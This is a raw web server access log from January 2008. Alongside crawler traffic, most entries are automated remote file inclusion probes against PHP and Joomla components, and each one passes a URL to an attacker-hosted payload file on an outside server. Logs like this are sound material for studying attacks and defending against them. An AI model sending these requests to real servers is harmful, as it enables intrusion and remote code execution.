72.249.46.109 - - [30/Jan/2008:07:14:16 -0800] "GET /logs/access_071229.log/?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.46.109 - - [30/Jan/2008:07:14:16 -0800] "GET /?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.46.109 - - [30/Jan/2008:07:14:16 -0800] "GET /logs/?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 32398 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [30/Jan/2008:07:14:50 -0800] "GET //log.details.html/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.sarion.info/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [30/Jan/2008:07:14:50 -0800] "GET /AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.sarion.info/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.10.80 - - [30/Jan/2008:07:15:15 -0800] "GET /logs/access_071225.log//?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:07:16:28 -0800] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:07:16:29 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:07:16:32 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.8.113 - - [30/Jan/2008:07:16:44 -0800] "GET /logs/access_071225.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.8.113 - - [30/Jan/2008:07:16:44 -0800] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.8.113 - - [30/Jan/2008:07:16:44 -0800] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:07:18:47 -0800] "GET /logs/access_071231.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:07:19:15 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.172.34.73 - - [30/Jan/2008:07:20:28 -0800] "GET /logs/access_080106.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://geocities.com/ini_prast/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.73 - - [30/Jan/2008:07:20:28 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://geocities.com/ini_prast/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.124.242.154 - - [30/Jan/2008:07:21:03 -0800] "GET /logs/access_071225.log//pandadir/modules/My_eGallery/public/displayCategory.php?adminpath=http://geocities.com/carneline0817/kontol/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.124.242.154 - - [30/Jan/2008:07:21:03 -0800] "GET //pandadir/modules/My_eGallery/public/displayCategory.php?adminpath=http://geocities.com/carneline0817/kontol/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.124.242.154 - - [30/Jan/2008:07:21:03 -0800] "GET /logs//pandadir/modules/My_eGallery/public/displayCategory.php?adminpath=http://geocities.com/carneline0817/kontol/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.20.143 - - [30/Jan/2008:07:21:10 -0800] "GET /funny/?S=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.191.68.75 - - [30/Jan/2008:07:22:46 -0800] "GET //login.php?dir=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.191.68.75 - - [30/Jan/2008:07:23:39 -0800] "GET //login.php?dir=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.200.228.2 - - [30/Jan/2008:07:23:56 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://photographersusa.com/catimages/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.157.58.25 - - [30/Jan/2008:07:23:59 -0800] "GET /logs/!scanhttp://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
207.157.58.25 - - [30/Jan/2008:07:24:04 -0800] "GET /!scanhttp://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
207.45.176.234 - - [30/Jan/2008:07:24:51 -0800] "GET /logs/show.php?page=http://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
207.45.176.234 - - [30/Jan/2008:07:24:51 -0800] "GET /show.php?page=http://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
66.7.194.105 - - [30/Jan/2008:07:26:11 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.bpec-english.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
66.7.194.105 - - [30/Jan/2008:07:26:11 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.bpec-english.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
207.45.176.234 - - [30/Jan/2008:07:26:38 -0800] "GET /logs/includes/functions.php?phpbb_root_path=http://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
207.45.176.234 - - [30/Jan/2008:07:26:38 -0800] "GET /includes/functions.php?phpbb_root_path=http://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
125.243.64.123 - - [30/Jan/2008:07:26:46 -0800] "GET /SQuery/lib/gore.php?libpath=http://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
125.243.64.123 - - [30/Jan/2008:07:26:50 -0800] "GET /logs/SQuery/lib/gore.php?libpath=http://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
84.16.251.245 - - [30/Jan/2008:07:26:55 -0800] "GET /logs/access_071220.log/bbs/skin/zero_vote/setup.php?dir=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.16.251.245 - - [30/Jan/2008:07:26:56 -0800] "GET /logs/bbs/skin/zero_vote/setup.php?dir=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.16.251.245 - - [30/Jan/2008:07:27:02 -0800] "GET /logs/access_071220.log/bbs/skin/zero_vote/setup.php?dir=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.16.251.245 - - [30/Jan/2008:07:27:02 -0800] "GET /logs/bbs/skin/zero_vote/setup.php?dir=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.16.251.245 - - [30/Jan/2008:07:27:13 -0800] "GET /logs/access_071216.log/bbs/skin/zero_vote/setup.php?dir=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.16.251.245 - - [30/Jan/2008:07:27:19 -0800] "GET /logs/access_071216.log/bbs/skin/zero_vote/setup.php?dir=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.64.123 - - [30/Jan/2008:07:27:22 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
125.243.64.123 - - [30/Jan/2008:07:27:22 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
193.200.228.2 - - [30/Jan/2008:07:28:04 -0800] "GET /logs/access.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://photographersusa.com/catimages/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.200.228.2 - - [30/Jan/2008:07:28:05 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://photographersusa.com/catimages/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.200.228.2 - - [30/Jan/2008:07:28:05 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://photographersusa.com/catimages/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.22.126 - - [30/Jan/2008:07:28:10 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [30/Jan/2008:07:28:11 -0800] "GET /megumi/Necklace/ HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.157.58.25 - - [30/Jan/2008:07:28:15 -0800] "GET /index2.php?p=http://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
207.157.58.25 - - [30/Jan/2008:07:28:15 -0800] "GET /logs/index2.php?p=http://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
72.21.63.146 - - [30/Jan/2008:07:28:17 -0800] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
193.200.228.2 - - [30/Jan/2008:07:28:30 -0800] "GET /logs/access_080106.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://photographersusa.com/catimages/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.200.228.2 - - [30/Jan/2008:07:28:30 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://photographersusa.com/catimages/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.200.228.2 - - [30/Jan/2008:07:28:31 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://photographersusa.com/catimages/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.16.251.245 - - [30/Jan/2008:07:28:48 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.16.251.245 - - [30/Jan/2008:07:28:48 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.20.76 - - [30/Jan/2008:07:29:14 -0800] "GET /retreat1/?S=A HTTP/1.0" 200 15065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.137 - - [30/Jan/2008:07:30:17 -0800] "GET /?D=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.70.19 - - [30/Jan/2008:07:30:21 -0800] "GET /logs/access_070713.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
72.55.164.178 - - [30/Jan/2008:07:30:24 -0800] "GET //index.php?option=com_rsgallery&page=inline&catid=http://www.financejobdirectory.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.200.228.2 - - [30/Jan/2008:07:30:24 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://photographersusa.com/catimages/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.249.70.19 - - [30/Jan/2008:07:30:28 -0800] "GET /logs/access_070729.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
83.221.124.31 - - [30/Jan/2008:07:30:54 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.70.19 - - [30/Jan/2008:07:31:31 -0800] "GET /logs/access_071105.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.45.242.50 - - [30/Jan/2008:07:31:59 -0800] "GET /!scanhttp://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
66.45.242.50 - - [30/Jan/2008:07:32:01 -0800] "GET /logs/!scanhttp://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
209.172.34.73 - - [30/Jan/2008:07:32:12 -0800] "GET /logs/access_080106.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.73 - - [30/Jan/2008:07:32:12 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.73 - - [30/Jan/2008:07:32:12 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.73 - - [30/Jan/2008:07:32:19 -0800] "GET /logs/access_080106.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.73 - - [30/Jan/2008:07:32:19 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.73 - - [30/Jan/2008:07:32:19 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.16.251.245 - - [30/Jan/2008:07:32:33 -0800] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.16.251.245 - - [30/Jan/2008:07:32:34 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.16.251.245 - - [30/Jan/2008:07:32:36 -0800] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.16.251.245 - - [30/Jan/2008:07:32:36 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.63.132.57 - - [30/Jan/2008:07:32:40 -0800] "GET /logs/access_080106.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.anamer.com/esupportv2.2.opened.ioncube/upload_ioncube/admin/.r/vampire.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.63.132.57 - - [30/Jan/2008:07:32:40 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.anamer.com/esupportv2.2.opened.ioncube/upload_ioncube/admin/.r/vampire.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.16.251.245 - - [30/Jan/2008:07:33:26 -0800] "GET /logs/access_071220.log/modules/Neos_Chronos/header.php?base_folder=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.16.251.245 - - [30/Jan/2008:07:33:37 -0800] "GET /logs/access_071220.log/modules/Neos_Chronos/header.php?base_folder=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.45.242.50 - - [30/Jan/2008:07:33:47 -0800] "GET /includes/functions.php?phpbb_root_path=http://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
66.45.242.50 - - [30/Jan/2008:07:33:48 -0800] "GET /logs/includes/functions.php?phpbb_root_path=http://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
193.254.203.35 - - [30/Jan/2008:07:33:52 -0800] "GET /logs/access_071230.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.rantandroll.com/vbgsitemap/files/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.254.203.35 - - [30/Jan/2008:07:33:52 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.rantandroll.com/vbgsitemap/files/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.254.203.35 - - [30/Jan/2008:07:33:53 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.rantandroll.com/vbgsitemap/files/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.200.228.2 - - [30/Jan/2008:07:34:19 -0800] "GET /logs/access_080106.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://photographersusa.com/catimages/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:07:34:23 -0800] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.70.19 - - [30/Jan/2008:07:34:43 -0800] "GET /logs/access_071218.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
207.58.138.211 - - [30/Jan/2008:07:34:47 -0800] "GET /logs/access_071229.log/index.php?option=com_glossary&func=display&Itemid=s@bun&catid=http://hungernwnc.org/data/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.138.211 - - [30/Jan/2008:07:34:53 -0800] "GET /index.php?option=com_glossary&func=display&Itemid=s@bun&catid=http://hungernwnc.org/data/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.138.211 - - [30/Jan/2008:07:34:58 -0800] "GET /logs/index.php?option=com_glossary&func=display&Itemid=s@bun&catid=http://hungernwnc.org/data/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.93.239.80 - - [30/Jan/2008:07:35:30 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
62.93.239.80 - - [30/Jan/2008:07:35:31 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
61.220.191.9 - - [30/Jan/2008:07:36:12 -0800] "GET /logs/access_071229.log/index.php?s=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.220.191.9 - - [30/Jan/2008:07:36:13 -0800] "GET /logs/index.php?s=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.110.50.107 - - [30/Jan/2008:07:37:01 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.32.128.178 - - [30/Jan/2008:07:37:21 -0800] "GET //login.php?dir=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.70.19 - - [30/Jan/2008:07:37:50 -0800] "GET /logs/access_071117.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
67.15.181.25 - - [30/Jan/2008:07:37:51 -0800] "GET /logs/index.php?option=com_addict&Itemid=&mosConfig_absolute_path=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
67.15.181.25 - - [30/Jan/2008:07:37:52 -0800] "GET /index.php?option=com_addict&Itemid=&mosConfig_absolute_path=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
87.98.217.40 - - [30/Jan/2008:07:38:42 -0800] "GET /logs/access_071225.log/index.php?body=http://www.terranova.dk/files/scandiertbanner.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.98.217.40 - - [30/Jan/2008:07:38:43 -0800] "GET /index.php?body=http://www.terranova.dk/files/scandiertbanner.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.98.217.40 - - [30/Jan/2008:07:38:43 -0800] "GET /logs/index.php?body=http://www.terranova.dk/files/scandiertbanner.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.85.158.146 - - [30/Jan/2008:07:38:57 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.70.19 - - [30/Jan/2008:07:38:59 -0800] "GET /logs/access_070922.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
83.148.126.98 - - [30/Jan/2008:07:39:05 -0800] "GET //skin/zero_vote/error.php?dir=http://guido93hack.altervista.org/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:07:39:59 -0800] "GET /logs/access_071230.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:07:40:00 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:07:40:01 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.55.164.178 - - [30/Jan/2008:07:40:27 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://gamezspace.net/images/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
72.55.164.178 - - [30/Jan/2008:07:40:27 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://gamezspace.net/images/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
207.157.58.25 - - [30/Jan/2008:07:40:33 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
207.157.58.25 - - [30/Jan/2008:07:40:35 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
203.86.232.194 - - [30/Jan/2008:07:40:40 -0800] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
